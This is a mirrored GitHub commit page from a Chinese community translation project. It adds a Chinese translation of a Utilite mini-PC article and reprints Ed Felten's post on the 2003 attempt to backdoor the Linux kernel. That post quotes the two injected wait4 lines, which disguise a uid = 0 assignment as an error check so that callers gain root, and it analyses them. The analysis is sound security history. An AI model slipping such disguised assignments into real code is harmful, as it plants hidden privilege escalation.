document/TranslateProject
2
0
Fork 0
mirror of https://github.com/LCTT/TranslateProject.git synced 2025-02-06 23:50:16 +08:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #116 from tinyeyeser/master

Browse Source 
已翻译 by Mr小眼儿。开始翻译The Linux Backdoor Attempt of 2003.md
This commit is contained in:
Xingyu.Wang 2013-10-10 22:04:38 -07:00
commit 3aedabf6c6
3 changed files with 79 additions and 77 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

82
sources/The Linux Backdoor Attempt of 2003.md
View File

@ -1,46 +1,46 @@
The Linux Backdoor Attempt of 2003
==================================
Josh [wrote][1] recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.)
Today I want to write about another [incident][2], in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we dont know who it was that made the attempt—and we probably never will.
Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.
But some people didnt like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.
But on Nov. 5, 2003, Larry McVoy [noticed][3] that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.
What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]
A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.
Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … its a classic backdoor.
This is a very clever piece of work. It looks like innocuous error checking, but its really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.
But the attempt didnt work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.
Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, well never know.
---
via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
The Linux Backdoor Attempt of 2003
==================================
Josh [wrote][1] recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.)
Today I want to write about another [incident][2], in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we dont know who it was that made the attempt—and we probably never will.
Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.
But some people didnt like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.
But on Nov. 5, 2003, Larry McVoy [noticed][3] that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.
What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
retval = -EINVAL;
[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]
A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.
Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … its a classic backdoor.
This is a very clever piece of work. It looks like innocuous error checking, but its really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.
But the attempt didnt work, because the Linux team was careful enough to notice that that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.
Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, well never know.
---
via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
本文由 [LCTT][] 原创翻译,[Linux中国][] 荣誉推出
译者:[译者ID][] 校对:[校对者ID][]
译者:[Mr小眼儿][] 校对:[校对者ID][]
[LCTT]:https://github.com/LCTT/TranslateProject
[Linux中国]:http://linux.cn/portal.php
[译者ID]:http://linux.cn/space/译者ID
[校对者ID]:http://linux.cn/space/校对者ID
[1]:https://freedom-to-tinker.com/blog/kroll/software-transparency-debian-openssl-bug/
[2]:https://lwn.net/Articles/57135/
[3]:https://lwn.net/Articles/57137/
[Mr小眼儿]:http://linux.cn/space/14801
[校对者ID]:http://linux.cn/space/校对者ID
[1]:https://freedom-to-tinker.com/blog/kroll/software-transparency-debian-openssl-bug/
[2]:https://lwn.net/Articles/57135/
[3]:https://lwn.net/Articles/57137/

36
sources/The Utilite Linux Mini PC.md
View File

@ -1,36 +0,0 @@
The Utilite Linux Mini PC
================================================================================
Hello guys!
Sometimes we need to test or use another Linux distribution than the one we use to complete our daily tasks and setting up a virtual machine is not always the best solution. Have you heard about the **Utilite** Linux Mini PC?
![](http://180016988.r.cdn77.net/wp-content/uploads/2013/10/utilite-computer-3.jpg)
utilite-computer-3The Utilite is a very good choice for users looking for a Linux Mini PC at an affordable price. This device is launched by Compulab, which is the manufacturer of the MintBox. Mintbox is a little Pc box which runs Linux Mint operating system. Utilite ARM-based Linux computer costs only **$99**, a fair price if we take in consideration what this device has to offer.
The **[Utilite][1]** linux device has **2 GB of RAM** and **4 GB of internal storage**, which can be extended using a micro-SD card. This mini computer supports both Ubuntu Linux and Google Android. If you like, you can also upgrade the device the Utilite Standard which comes with with a **dual core processor** and **2 GB of RAM** along with **8 GB of internal memory** and micro-SD card support. This device is the first ARM-based model from the company to feature Freescales i.MX6 processor family and in my opinion is the best way to run Ubuntu and other GNU/Linux operating systems without buying expensive hardware.
The Utilite has single core, dual core and quad core options for the processor and an also support HDMI + DVI, 2x GbE, Wi Fi and Bluetooth. There is also the Utilite Pro which comes with a quad core processor and 2 GB of RAM along with 32 GB of internal memory. Utilite Pro has support for:
- micro-SD card
- HDMI + DVI
- 2x GbE
- WiFi
- Bluetooth
This mini Pc also features 2 Gigabit Ethernet ports , PDIF and stereo audio jacks as well as wo RS232 serial ports. A very good thing about Utilite is the the low power consumption, 3 to 8 watts of power.
--------------------------------------------------------------------------------
via: http://www.unixmen.com/utilite-linux-mini-pc/
本文由 [LCTT][] 原创翻译,[Linux中国][] 荣誉推出
译者:[Mr小眼儿][] 校对:[校对者ID][]
[LCTT]:https://github.com/LCTT/TranslateProject
[Linux中国]:http://linux.cn/portal.php
[Mr小眼儿]:http://linux.cn/space/14801
[校对者ID]:http://linux.cn/space/校对者ID
[1]:http://utilite-computer.com/web/home

38
translated/The Utilite Linux Mini PC.md Normal file
View File

@ -0,0 +1,38 @@
屌丝专用Linux迷你电脑 —— Utilite
================================================================================
同学们好~
除了完成日常工作有时需要测试或使用某一个Linux发行版的时候我们通常使用虚拟机但这并不是最好的解决方案你们是否听过Linux迷你电脑**Utilite**呢?
![](http://180016988.r.cdn77.net/wp-content/uploads/2013/10/utilite-computer-3.jpg)
对于正在寻找一款Linux迷你电脑同时却囊中羞涩的同学来说Utilite是一个非常棒的选择。这款设备由Compulab研发Compulab同时还是MintBox的制造商。Mintbox就是一款运行Linux Mint操作系统的小型电脑盒子。基于ARM的Utilite售价仅为**99美刀**,性价比出色!
**[Utilite][1]**标准版配置为**2G内存**、**4G存储容量**支持micro-SD扩展卡。支持搭载Ubuntu或Android系统。如果你愿意还可以购买升级版**双核处理器**、**2G内存**、**8G存储**以及micro-SD扩展卡支持。这款设备是该公司第一款基于ARM模型的产品采用Freescale的i.MX6系列处理器。在我看来如果买不起昂贵的硬件这是运行Ubuntu和其他GNU/Linux操作系统的最佳方法。
Utilite有单核、双核、四核多个处理器方案支持HDMI+DVI双接口2倍Gbe千兆以太网支持WiFi和蓝牙。除了标准版和升级版Utilite还提供了专业版配备四核处理器、2G内存、32G存储下面是专业版的配置
- micro-SD card
- HDMI + DVI
- 2x GbE
- WiFi
- Bluetooth
如配置中所示这款迷你电脑还支持2倍千兆以太网PDIF音频输出、立体声音频插孔和RS232系列端口。Utilite的另一个巨大优势是耗电量非常低只有3-8瓦。
各位屌丝买不起土豪金要不来一个Utilite试试~?玩好了还可以推荐给你的女神哦~
--------------------------------------------------------------------------------
via: http://www.unixmen.com/utilite-linux-mini-pc/
本文由 [LCTT][] 原创翻译,[Linux中国][] 荣誉推出
译者:[Mr小眼儿][] 校对:[校对者ID][]
[LCTT]:https://github.com/LCTT/TranslateProject
[Linux中国]:http://linux.cn/portal.php
[Mr小眼儿]:http://linux.cn/space/14801
[校对者ID]:http://linux.cn/space/校对者ID
[1]:http://utilite-computer.com/web/home